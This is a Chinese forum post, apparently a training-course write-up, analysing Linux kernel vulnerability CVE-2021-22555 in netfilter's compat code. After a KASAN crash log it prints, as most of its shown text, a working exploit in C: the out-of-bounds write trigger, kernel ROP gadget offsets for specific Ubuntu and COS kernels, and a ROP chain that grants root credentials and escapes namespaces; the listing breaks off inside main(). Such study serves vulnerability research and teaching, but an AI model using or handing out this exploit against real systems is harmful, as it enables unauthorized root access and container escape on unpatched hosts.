首页
社区
课程
招聘
[原创]内核漏洞学习记录(cve-2021-22555)
2024-6-6 11:05 1842

[原创]内核漏洞学习记录(cve-2021-22555)

2024-6-6 11:05
1842

前言

看雪的二进制课程已经结束了,此篇是考核内容,顺便检测一下我对课程内容的理解程度

参考内容

https://www.anquanke.com/post/id/254027

https://arttnba3.cn/2022/04/01/CVE-0X07-CVE-2021-22555/

https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html

以及看雪的二进制课程

漏洞分析

先看一下kasan给出的信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
[ 1185.205439] ==================================================================
[ 1185.205993] BUG: KASAN: slab-out-of-bounds in xt_compat_target_from_user+0x20a/0x4c0 [x_tables]
[ 1185.206102] Write of size 4 at addr ffff8881e4c97600 by task poc/2059
 
[ 1185.206255] CPU: 1 PID: 2059 Comm: poc Not tainted 5.8.1 #1
[ 1185.206257] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 11/12/2020
[ 1185.206259] Call Trace:
[ 1185.206326]  dump_stack+0x9d/0xda
[ 1185.206346]  print_address_description.constprop.0+0x1f/0x210
[ 1185.206353]  ? _raw_spin_lock_irqsave+0x8e/0xf0
[ 1185.206355]  ? _raw_spin_trylock_bh+0x130/0x130
[ 1185.206371]  ? xt_compat_target_from_user+0x20a/0x4c0 [x_tables]
[ 1185.206373]  kasan_report.cold+0x37/0x7c
[ 1185.206377]  ? xt_compat_target_from_user+0x20a/0x4c0 [x_tables]
[ 1185.206390]  check_memory_region+0x15b/0x1e0
[ 1185.206393]  memset+0x24/0x50
[ 1185.206399]  xt_compat_target_from_user+0x20a/0x4c0 [x_tables]
[ 1185.206406]  ? xt_compat_match_from_user+0x4c0/0x4c0 [x_tables]
[ 1185.206410]  ? __kmalloc_node+0x127/0x380
[ 1185.206416]  translate_compat_table+0xf00/0x16d0 [ip6_tables]
[ 1185.206420]  ? ip6t_register_table+0x2d0/0x2d0 [ip6_tables]
[ 1185.206423]  ? kasan_unpoison_shadow+0x38/0x50
[ 1185.206425]  ? __kasan_kmalloc.constprop.0+0xcf/0xe0
[ 1185.206427]  ? kasan_kmalloc+0x9/0x10
[ 1185.206428]  ? __kmalloc_node+0x127/0x380
[ 1185.206431]  ? __kasan_check_write+0x14/0x20
[ 1185.206433]  compat_do_replace.isra.0+0x160/0x380 [ip6_tables]
[ 1185.206435]  ? __kasan_check_write+0x14/0x20
[ 1185.206438]  ? translate_compat_table+0x16d0/0x16d0 [ip6_tables]
[ 1185.206453]  ? apparmor_task_alloc+0x2f0/0x2f0
[ 1185.206465]  ? is_bpf_text_address+0xe/0x20
[ 1185.206478]  ? ns_capable_common+0x5c/0xe0
[ 1185.206481]  compat_do_ip6t_set_ctl+0xe4/0x130 [ip6_tables]
[ 1185.206496]  compat_nf_setsockopt+0x74/0x100
[ 1185.206503]  compat_ipv6_setsockopt.part.0+0x582/0x780
[ 1185.206505]  ? ipv6_setsockopt+0x110/0x110
[ 1185.206507]  ? save_stack+0x42/0x50
[ 1185.206509]  ? save_stack+0x23/0x50
[ 1185.206511]  ? __kasan_kmalloc.constprop.0+0xcf/0xe0
[ 1185.206513]  ? kasan_slab_alloc+0xe/0x10
[ 1185.206514]  ? kmem_cache_alloc+0xd7/0x250
[ 1185.206521]  ? security_file_alloc+0x2f/0x130
[ 1185.206525]  ? __alloc_file+0xb1/0x370
[ 1185.206526]  ? alloc_empty_file+0x46/0xf0
[ 1185.206529]  ? alloc_file+0x59/0x500
[ 1185.206530]  ? alloc_file_pseudo+0x17e/0x270
[ 1185.206535]  ? sock_alloc_file+0x47/0x170
[ 1185.206537]  ? __sys_socket+0x108/0x1d0
[ 1185.206541]  ? __do_compat_sys_socketcall+0x51c/0x5e0
[ 1185.206543]  ? __ia32_compat_sys_socketcall+0x53/0x70
[ 1185.206549]  ? do_syscall_32_irqs_on+0x4a/0x70
[ 1185.206552]  ? do_fast_syscall_32+0x5f/0xd0
[ 1185.206554]  ? do_SYSENTER_32+0x1f/0x30
[ 1185.206558]  ? entry_SYSENTER_compat_after_hwframe+0x4d/0x5f
[ 1185.206560]  ? __ia32_compat_sys_socketcall+0x53/0x70
[ 1185.206561]  ? do_syscall_32_irqs_on+0x4a/0x70
[ 1185.206563]  ? do_fast_syscall_32+0x5f/0xd0
[ 1185.206565]  ? do_SYSENTER_32+0x1f/0x30
[ 1185.206567]  ? entry_SYSENTER_compat_after_hwframe+0x4d/0x5f
[ 1185.206569]  ? __ia32_compat_sys_socketcall+0x53/0x70
[ 1185.206571]  ? do_syscall_32_irqs_on+0x4a/0x70
[ 1185.206573]  ? do_fast_syscall_32+0x5f/0xd0
[ 1185.206575]  ? do_SYSENTER_32+0x1f/0x30
[ 1185.206577]  ? entry_SYSENTER_compat_after_hwframe+0x4d/0x5f
[ 1185.206579]  ? __sys_socket+0xdd/0x1d0
[ 1185.206581]  ? __do_compat_sys_socketcall+0x51c/0x5e0
[ 1185.206583]  ? __ia32_compat_sys_socketcall+0x53/0x70
[ 1185.206585]  ? do_syscall_32_irqs_on+0x4a/0x70
[ 1185.206587]  ? do_fast_syscall_32+0x5f/0xd0
[ 1185.206588]  ? do_SYSENTER_32+0x1f/0x30
[ 1185.206590]  ? entry_SYSENTER_compat_after_hwframe+0x4d/0x5f
[ 1185.206595]  ? __mod_lruvec_state+0x8c/0x320
[ 1185.206598]  ? alloc_pages_current+0xdc/0x1c0
[ 1185.206600]  ? kasan_init_slab_obj+0x25/0x30
[ 1185.206603]  ? setup_object.isra.0+0x2b/0xa0
[ 1185.206605]  ? __kasan_check_write+0x14/0x20
[ 1185.206607]  ? apparmor_file_alloc_security+0x178/0x5c0
[ 1185.206609]  ? kasan_unpoison_shadow+0x38/0x50
[ 1185.206611]  ? apparmor_ptrace_access_check+0x460/0x460
[ 1185.206613]  ? security_file_alloc+0x2f/0x130
[ 1185.206614]  ? kmem_cache_alloc+0x180/0x250
[ 1185.206617]  ? __kasan_check_write+0x14/0x20
[ 1185.206619]  ? __mutex_init+0xba/0x130
[ 1185.206621]  ? __alloc_file+0x1a5/0x370
[ 1185.206623]  ? alloc_empty_file+0x92/0xf0
[ 1185.206625]  ? alloc_file+0x228/0x500
[ 1185.206629]  ? _cond_resched+0x19/0x30
[ 1185.206632]  ? aa_sk_perm+0x12a/0x610
[ 1185.206634]  compat_ipv6_setsockopt+0xb4/0x160
[ 1185.206640]  ? __fget_files+0x12b/0x250
[ 1185.206647]  inet_csk_compat_setsockopt+0x6b/0x120
[ 1185.206650]  compat_tcp_setsockopt+0x1c/0x30
[ 1185.206653]  compat_sock_common_setsockopt+0x8a/0x160
[ 1185.206655]  __compat_sys_setsockopt+0x139/0x330
[ 1185.206658]  ? __sys_socket+0x11b/0x1d0
[ 1185.206660]  ? __x32_compat_sys_recvmmsg_time32+0x150/0x150
[ 1185.206662]  ? __kasan_check_write+0x14/0x20
[ 1185.206664]  __do_compat_sys_socketcall+0x48c/0x5e0
[ 1185.206667]  ? __x32_compat_sys_setsockopt+0x150/0x150
[ 1185.206673]  ? perf_event_namespaces+0x1a/0x30
[ 1185.206677]  ? walk_process_tree+0x330/0x330
[ 1185.206679]  ? __kasan_check_read+0x11/0x20
[ 1185.206684]  ? fpregs_assert_state_consistent+0x22/0xa0
[ 1185.206686]  ? __prepare_exit_to_usermode+0x76/0x210
[ 1185.206688]  ? fpregs_assert_state_consistent+0x22/0xa0
[ 1185.206690]  __ia32_compat_sys_socketcall+0x53/0x70
[ 1185.206693]  do_syscall_32_irqs_on+0x4a/0x70
[ 1185.206696]  do_fast_syscall_32+0x5f/0xd0
[ 1185.206698]  do_SYSENTER_32+0x1f/0x30
[ 1185.206700]  entry_SYSENTER_compat_after_hwframe+0x4d/0x5f
[ 1185.206705] RIP: 0023:0xf7f08569
[ 1185.206711] Code: c4 01 10 03 03 74 c0 01 10 05 03 74 b8 01 10 06 03 74 b4 01 10 07 03 74 b0 01 10 08 03 74 d8 01 00 51 52 55 89 e5 0f 34 cd 80 <5d> 5a 59 c3 90 90 90 90 8d b4 26 00 00 00 00 8d b4 26 00 00 00 00
[ 1185.206712] RSP: 002b:00000000ffed1440 EFLAGS: 00000246 ORIG_RAX: 0000000000000066
[ 1185.206715] RAX: ffffffffffffffda RBX: 000000000000000e RCX: 00000000ffed1458
[ 1185.206716] RDX: 00000000ffed14bc RSI: 00000000f7ef5000 RDI: 00000000ffed16cc
[ 1185.206717] RBP: 00000000ffed16e8 R08: 0000000000000000 R09: 0000000000000000
[ 1185.206718] R10: 0000000000000000 R11: 0000000000000000 R12: 0000000000000000
[ 1185.206719] R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000
 
[ 1185.206746] Allocated by task 2059:
[ 1185.206836]  save_stack+0x23/0x50
[ 1185.206838]  __kasan_kmalloc.constprop.0+0xcf/0xe0
[ 1185.206840]  kasan_kmalloc+0x9/0x10
[ 1185.206842]  __kmalloc_node+0x127/0x380
[ 1185.206845]  kvmalloc_node+0x7b/0x90
[ 1185.206855]  xt_alloc_table_info+0x2f/0x80 [x_tables]
[ 1185.206860]  translate_compat_table+0xb38/0x16d0 [ip6_tables]
[ 1185.206862]  compat_do_replace.isra.0+0x160/0x380 [ip6_tables]
[ 1185.206865]  compat_do_ip6t_set_ctl+0xe4/0x130 [ip6_tables]
[ 1185.206868]  compat_nf_setsockopt+0x74/0x100
[ 1185.206871]  compat_ipv6_setsockopt.part.0+0x582/0x780
[ 1185.206873]  compat_ipv6_setsockopt+0xb4/0x160
[ 1185.206875]  inet_csk_compat_setsockopt+0x6b/0x120
[ 1185.206877]  compat_tcp_setsockopt+0x1c/0x30
[ 1185.206879]  compat_sock_common_setsockopt+0x8a/0x160
[ 1185.206882]  __compat_sys_setsockopt+0x139/0x330
[ 1185.206884]  __do_compat_sys_socketcall+0x48c/0x5e0
[ 1185.206886]  __ia32_compat_sys_socketcall+0x53/0x70
[ 1185.206889]  do_syscall_32_irqs_on+0x4a/0x70
[ 1185.206892]  do_fast_syscall_32+0x5f/0xd0
[ 1185.206894]  do_SYSENTER_32+0x1f/0x30
[ 1185.206896]  entry_SYSENTER_compat_after_hwframe+0x4d/0x5f
 
[ 1185.206976] Freed by task 0:
[ 1185.206998] (stack is not available)
 
[ 1185.207036] The buggy address belongs to the object at ffff8881e4c97400
                which belongs to the cache kmalloc-512(1052:session-1.scope) of size 512
[ 1185.207140] The buggy address is located 0 bytes to the right of
                512-byte region [ffff8881e4c97400, ffff8881e4c97600)
[ 1185.207317] The buggy address belongs to the page:
[ 1185.207382] page:ffffea0007932400 refcount:1 mapcount:0 mapping:0000000000000000 index:0xffff8881e4c96400 head:ffffea0007932400 order:3 compound_mapcount:0 compound_pincount:0
[ 1185.207384] flags: 0x17ffffc0010200(slab|head)
[ 1185.207387] raw: 0017ffffc0010200 dead000000000100 dead000000000122 ffff8881cab0b400
[ 1185.207389] raw: ffff8881e4c96400 0000000080200016 00000001ffffffff 0000000000000000
[ 1185.207390] page dumped because: kasan: bad access detected
 
[ 1185.207402] Memory state around the buggy address:
[ 1185.207459]  ffff8881e4c97500: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[ 1185.207507]  ffff8881e4c97580: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[ 1185.207549] >ffff8881e4c97600: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
[ 1185.207605]                    ^
[ 1185.207628]  ffff8881e4c97680: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
[ 1185.207732]  ffff8881e4c97700: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
[ 1185.207780] ==================================================================
[ 1185.207882] Disabling lock debugging due to kernel taint
[ 1185.209449] x_tables: ip6_tables: icmp6.0 match: invalid size 8 (kernel) != (user) 212

看样子是xt_compat_target_from_user函数出现了两字节写的堆溢出

由于本人对Linux内核不太熟悉,所以只能从exp入手来分析漏洞成因,以及漏洞所在的模块的大致作用

poc如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
// exp.c
#define _GNU_SOURCE
#include <err.h>
#include <errno.h>
#include <fcntl.h>
#include <inttypes.h>
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <net/if.h>
#include <netinet/in.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <linux/netfilter_ipv4/ip_tables.h>
// clang-format on
 
#define PAGE_SIZE 0x1000
#define PRIMARY_SIZE 0x1000
#define SECONDARY_SIZE 0x400
 
#define NUM_SOCKETS 4
#define NUM_SKBUFFS 128
#define NUM_PIPEFDS 256
#define NUM_MSQIDS 4096
 
#define HOLE_STEP 1024
 
#define MTYPE_PRIMARY 0x41
#define MTYPE_SECONDARY 0x42
#define MTYPE_FAKE 0x1337
 
#define MSG_TAG 0xAAAAAAAA
 
// #define KERNEL_COS_5_4_89 1
#define KERNEL_UBUNTU_5_8_0_48 1
 
// clang-format off
#ifdef KERNEL_COS_5_4_89
// 0xffffffff810360f8 : push rax ; jmp qword ptr [rcx]
#define PUSH_RAX_JMP_QWORD_PTR_RCX 0x360F8
// 0xffffffff815401df : pop rsp ; pop rbx ; ret
#define POP_RSP_POP_RBX_RET 0x5401DF
 
// 0xffffffff816d3a65 : enter 0, 0 ; pop rbx ; pop r14 ; pop rbp ; ret
#define ENTER_0_0_POP_RBX_POP_R14_POP_RBP_RET 0x6D3A65
// 0xffffffff814ddfa8 : mov qword ptr [r14], rbx ; pop rbx ; pop r14 ; pop rbp ; ret
#define MOV_QWORD_PTR_R14_RBX_POP_RBX_POP_R14_POP_RBP_RET 0x4DDFA8
// 0xffffffff81073972 : push qword ptr [rbp + 0x25] ; pop rbp ; ret
#define PUSH_QWORD_PTR_RBP_25_POP_RBP_RET 0x73972
// 0xffffffff8106748c : mov rsp, rbp ; pop rbp ; ret
#define MOV_RSP_RBP_POP_RBP_RET 0x6748C
 
// 0xffffffff810c7c80 : pop rdx ; ret
#define POP_RDX_RET 0xC7C80
// 0xffffffff8143a2b4 : pop rsi ; ret
#define POP_RSI_RET 0x43A2B4
// 0xffffffff81067520 : pop rdi ; ret
#define POP_RDI_RET 0x67520
// 0xffffffff8100054b : pop rbp ; ret
#define POP_RBP_RET 0x54B
 
// 0xffffffff812383a6 : mov rdi, rax ; jne 0xffffffff81238396 ; pop rbp ; ret
#define MOV_RDI_RAX_JNE_POP_RBP_RET 0x2383A6
// 0xffffffff815282e1 : cmp rdx, 1 ; jne 0xffffffff8152831d ; pop rbp ; ret
#define CMP_RDX_1_JNE_POP_RBP_RET 0x5282E1
 
#define FIND_TASK_BY_VPID 0x963C0
#define SWITCH_TASK_NAMESPACES 0x9D080
#define COMMIT_CREDS 0x9EC10
#define PREPARE_KERNEL_CRED 0x9F1F0
 
#define ANON_PIPE_BUF_OPS 0xE51600
#define INIT_NSPROXY 0x1250590
#elif KERNEL_UBUNTU_5_8_0_48
// 0xffffffff816e9783 : push rsi ; jmp qword ptr [rsi + 0x39]
#define PUSH_RSI_JMP_QWORD_PTR_RSI_39 0x6E9783
// 0xffffffff8109b6c0 : pop rsp ; ret
#define POP_RSP_RET 0x9B6C0
// 0xffffffff8106db59 : add rsp, 0xd0 ; ret
#define ADD_RSP_D0_RET 0x6DB59
 
// 0xffffffff811a21c3 : enter 0, 0 ; pop rbx ; pop r12 ; pop rbp ; ret
#define ENTER_0_0_POP_RBX_POP_R12_POP_RBP_RET 0x1A21C3
// 0xffffffff81084de3 : mov qword ptr [r12], rbx ; pop rbx ; pop r12 ; pop rbp ; ret
#define MOV_QWORD_PTR_R12_RBX_POP_RBX_POP_R12_POP_RBP_RET 0x84DE3
// 0xffffffff816a98ff : push qword ptr [rbp + 0xa] ; pop rbp ; ret
#define PUSH_QWORD_PTR_RBP_A_POP_RBP_RET 0x6A98FF
// 0xffffffff810891bc : mov rsp, rbp ; pop rbp ; ret
#define MOV_RSP_RBP_POP_RBP_RET 0x891BC
 
// 0xffffffff810f5633 : pop rcx ; ret
#define POP_RCX_RET 0xF5633
// 0xffffffff811abaae : pop rsi ; ret
#define POP_RSI_RET 0x1ABAAE
// 0xffffffff81089250 : pop rdi ; ret
#define POP_RDI_RET 0x89250
// 0xffffffff810005ae : pop rbp ; ret
#define POP_RBP_RET 0x5AE
 
// 0xffffffff81557894 : mov rdi, rax ; jne 0xffffffff81557888 ; xor eax, eax ; ret
#define MOV_RDI_RAX_JNE_XOR_EAX_EAX_RET 0x557894
// 0xffffffff810724db : cmp rcx, 4 ; jne 0xffffffff810724c0 ; pop rbp ; ret
#define CMP_RCX_4_JNE_POP_RBP_RET 0x724DB
 
#define FIND_TASK_BY_VPID 0xBFBC0
#define SWITCH_TASK_NAMESPACES 0xC7A50
#define COMMIT_CREDS 0xC8C80
#define PREPARE_KERNEL_CRED 0xC9110
 
#define ANON_PIPE_BUF_OPS 0x1078380
#define INIT_NSPROXY 0x1663080
#else
#error "No kernel version defined"
#endif
// clang-format on
 
#define SKB_SHARED_INFO_SIZE 0x140
#define MSG_MSG_SIZE (sizeof(struct msg_msg))
#define MSG_MSGSEG_SIZE (sizeof(struct msg_msgseg))
 
struct msg_msg {
  uint64_t m_list_next;
  uint64_t m_list_prev;
  uint64_t m_type;
  uint64_t m_ts;
  uint64_t next;
  uint64_t security;
};
 
struct msg_msgseg {
  uint64_t next;
};
 
struct pipe_buffer {
  uint64_t page;
  uint32_t offset;
  uint32_t len;
  uint64_t ops;
  uint32_t flags;
  uint32_t pad;
  uint64_t private;
};
 
struct pipe_buf_operations {
  uint64_t confirm;
  uint64_t release;
  uint64_t steal;
  uint64_t get;
};
 
struct {
  long mtype;
  char mtext[PRIMARY_SIZE - MSG_MSG_SIZE];
} msg_primary;
 
struct {
  long mtype;
  char mtext[SECONDARY_SIZE - MSG_MSG_SIZE];
} msg_secondary;
 
struct {
  long mtype;
  char mtext[PAGE_SIZE - MSG_MSG_SIZE + PAGE_SIZE - MSG_MSGSEG_SIZE];
} msg_fake;
 
void build_msg_msg(struct msg_msg *msg, uint64_t m_list_next,
                   uint64_t m_list_prev, uint64_t m_ts, uint64_t next) {
  msg->m_list_next = m_list_next;
  msg->m_list_prev = m_list_prev;
  msg->m_type = MTYPE_FAKE;
  msg->m_ts = m_ts;
  msg->next = next;
  msg->security = 0;
}
 
int write_msg(int msqid, const void *msgp, size_t msgsz, long msgtyp) {
  *(long *)msgp = msgtyp;
  if (msgsnd(msqid, msgp, msgsz - sizeof(long), 0) < 0) {
    perror("[-] msgsnd");
    return -1;
  }
  return 0;
}
 
int peek_msg(int msqid, void *msgp, size_t msgsz, long msgtyp) {
  if (msgrcv(msqid, msgp, msgsz - sizeof(long), msgtyp, MSG_COPY | IPC_NOWAIT) <
      0) {
    perror("[-] msgrcv");
    return -1;
  }
  return 0;
}
 
int read_msg(int msqid, void *msgp, size_t msgsz, long msgtyp) {
  if (msgrcv(msqid, msgp, msgsz - sizeof(long), msgtyp, 0) < 0) {
    perror("[-] msgrcv");
    return -1;
  }
  return 0;
}
 
int spray_skbuff(int ss[NUM_SOCKETS][2], const void *buf, size_t size) {
  for (int i = 0; i < NUM_SOCKETS; i++) {
    for (int j = 0; j < NUM_SKBUFFS; j++) {
      if (write(ss[i][0], buf, size) < 0) {
        perror("[-] write");
        return -1;
      }
    }
  }
  return 0;
}
 
int free_skbuff(int ss[NUM_SOCKETS][2], void *buf, size_t size) {
  for (int i = 0; i < NUM_SOCKETS; i++) {
    for (int j = 0; j < NUM_SKBUFFS; j++) {
      if (read(ss[i][1], buf, size) < 0) {
        perror("[-] read");
        return -1;
      }
    }
  }
  return 0;
}
 
int trigger_oob_write(int s) {
  struct __attribute__((__packed__)) {
    struct ipt_replace replace;
    struct ipt_entry entry;
    struct xt_entry_match match;
    char pad[0x108 + PRIMARY_SIZE - 0x200 - 0x2];
    struct xt_entry_target target;
  } data = {0};
 
  data.replace.num_counters = 1;
  data.replace.num_entries = 1;
  data.replace.size = (sizeof(data.entry) + sizeof(data.match) +
                       sizeof(data.pad) + sizeof(data.target));
 
  data.entry.next_offset = (sizeof(data.entry) + sizeof(data.match) +
                            sizeof(data.pad) + sizeof(data.target));
  data.entry.target_offset =
      (sizeof(data.entry) + sizeof(data.match) + sizeof(data.pad));
 
  data.match.u.user.match_size = (sizeof(data.match) + sizeof(data.pad));
  strcpy(data.match.u.user.name, "icmp");
  data.match.u.user.revision = 0;
 
  data.target.u.user.target_size = sizeof(data.target);
  strcpy(data.target.u.user.name, "NFQUEUE");
  data.target.u.user.revision = 1;
 
  // Partially overwrite the adjacent buffer with 2 bytes of zero.
  if (setsockopt(s, SOL_IP, IPT_SO_SET_REPLACE, &data, sizeof(data)) != 0) {
    if (errno == ENOPROTOOPT) {
      printf("[-] Error ip_tables module is not loaded.\n");
      return -1;
    }
  }
 
  return 0;
}
 
// Note: Must not touch offset 0x10-0x18.
void build_krop(char *buf, uint64_t kbase_addr, uint64_t scratchpad_addr) {
  uint64_t *rop;
#ifdef KERNEL_COS_5_4_89
  *(uint64_t *)&buf[0x00] = kbase_addr + POP_RSP_POP_RBX_RET;
 
  rop = (uint64_t *)&buf[0x18];
 
  // Save RBP at scratchpad_addr.
  *rop++ = kbase_addr + ENTER_0_0_POP_RBX_POP_R14_POP_RBP_RET;
  *rop++ = scratchpad_addr; // R14
  *rop++ = 0xDEADBEEF;      // RBP
  *rop++ = kbase_addr + MOV_QWORD_PTR_R14_RBX_POP_RBX_POP_R14_POP_RBP_RET;
  *rop++ = 0xDEADBEEF; // RBX
  *rop++ = 0xDEADBEEF; // R14
  *rop++ = 0xDEADBEEF; // RBP
 
  // commit_creds(prepare_kernel_cred(NULL))
  *rop++ = kbase_addr + POP_RDI_RET;
  *rop++ = 0; // RDI
  *rop++ = kbase_addr + PREPARE_KERNEL_CRED;
  *rop++ = kbase_addr + POP_RDX_RET;
  *rop++ = 1; // RDX
  *rop++ = kbase_addr + CMP_RDX_1_JNE_POP_RBP_RET;
  *rop++ = 0xDEADBEEF; // RBP
  *rop++ = kbase_addr + MOV_RDI_RAX_JNE_POP_RBP_RET;
  *rop++ = 0xDEADBEEF; // RBP
  *rop++ = kbase_addr + COMMIT_CREDS;
 
  // switch_task_namespaces(find_task_by_vpid(1), init_nsproxy)
  *rop++ = kbase_addr + POP_RDI_RET;
  *rop++ = 1; // RDI
  *rop++ = kbase_addr + FIND_TASK_BY_VPID;
  *rop++ = kbase_addr + POP_RDX_RET;
  *rop++ = 1; // RDX
  *rop++ = kbase_addr + CMP_RDX_1_JNE_POP_RBP_RET;
  *rop++ = 0xDEADBEEF; // RBP
  *rop++ = kbase_addr + MOV_RDI_RAX_JNE_POP_RBP_RET;
  *rop++ = 0xDEADBEEF; // RBP
  *rop++ = kbase_addr + POP_RSI_RET;
  *rop++ = kbase_addr + INIT_NSPROXY; // RSI
  *rop++ = kbase_addr + SWITCH_TASK_NAMESPACES;
 
  // Load RBP from scratchpad_addr and resume execution.
  *rop++ = kbase_addr + POP_RBP_RET;
  *rop++ = scratchpad_addr - 0x25; // RBP
  *rop++ = kbase_addr + PUSH_QWORD_PTR_RBP_25_POP_RBP_RET;
  *rop++ = kbase_addr + MOV_RSP_RBP_POP_RBP_RET;
#elif KERNEL_UBUNTU_5_8_0_48
  *(uint64_t *)&buf[0x39] = kbase_addr + POP_RSP_RET;
  *(uint64_t *)&buf[0x00] = kbase_addr + ADD_RSP_D0_RET;
 
  rop = (uint64_t *)&buf[0xD8];
 
  // Save RBP at scratchpad_addr.
  *rop++ = kbase_addr + ENTER_0_0_POP_RBX_POP_R12_POP_RBP_RET;
  *rop++ = scratchpad_addr; // R12
  *rop++ = 0xDEADBEEF;      // RBP
  *rop++ = kbase_addr + MOV_QWORD_PTR_R12_RBX_POP_RBX_POP_R12_POP_RBP_RET;
  *rop++ = 0xDEADBEEF; // RBX
  *rop++ = 0xDEADBEEF; // R12
  *rop++ = 0xDEADBEEF; // RBP
 
  // commit_creds(prepare_kernel_cred(NULL))
  *rop++ = kbase_addr + POP_RDI_RET;
  *rop++ = 0; // RDI
  *rop++ = kbase_addr + PREPARE_KERNEL_CRED;
  *rop++ = kbase_addr + POP_RCX_RET;
  *rop++ = 4; // RCX
  *rop++ = kbase_addr + CMP_RCX_4_JNE_POP_RBP_RET;
  *rop++ = 0xDEADBEEF; // RBP
  *rop++ = kbase_addr + MOV_RDI_RAX_JNE_XOR_EAX_EAX_RET;
  *rop++ = kbase_addr + COMMIT_CREDS;
 
  // switch_task_namespaces(find_task_by_vpid(1), init_nsproxy)
  *rop++ = kbase_addr + POP_RDI_RET;
  *rop++ = 1; // RDI
  *rop++ = kbase_addr + FIND_TASK_BY_VPID;
  *rop++ = kbase_addr + POP_RCX_RET;
  *rop++ = 4; // RCX
  *rop++ = kbase_addr + CMP_RCX_4_JNE_POP_RBP_RET;
  *rop++ = 0xDEADBEEF; // RBP
  *rop++ = kbase_addr + MOV_RDI_RAX_JNE_XOR_EAX_EAX_RET;
  *rop++ = kbase_addr + POP_RSI_RET;
  *rop++ = kbase_addr + INIT_NSPROXY; // RSI
  *rop++ = kbase_addr + SWITCH_TASK_NAMESPACES;
 
  // Load RBP from scratchpad_addr and resume execution.
  *rop++ = kbase_addr + POP_RBP_RET;
  *rop++ = scratchpad_addr - 0xA; // RBP
  *rop++ = kbase_addr + PUSH_QWORD_PTR_RBP_A_POP_RBP_RET;
  *rop++ = kbase_addr + MOV_RSP_RBP_POP_RBP_RET;
#endif
}
 
int setup_sandbox(void) {
  if (unshare(CLONE_NEWUSER) < 0) {
    perror("[-] unshare(CLONE_NEWUSER)");
    return -1;
  }
  if (unshare(CLONE_NEWNET) < 0) {
    perror("[-] unshare(CLONE_NEWNET)");
    return -1;
  }
 
  cpu_set_t set;
  CPU_ZERO(&set);
  CPU_SET(0, &set);
  if (sched_setaffinity(getpid(), sizeof(set), &set) < 0) {
    perror("[-] sched_setaffinity");
    return -1;
  }
 
  return 0;
}
 
int main(int argc, char *argv[]) {
  int s;
  int fd;
  int ss[NUM_SOCKETS][2];
  int pipefd[NUM_PIPEFDS][2];
  int msqid[NUM_MSQIDS];
 
  char primary_buf[PRIMARY_SIZE - SKB_SHARED_INFO_SIZE];
  char secondary_buf[SECONDARY_SIZE - SKB_SHARED_INFO_SIZE];
 
  struct msg_msg *msg;
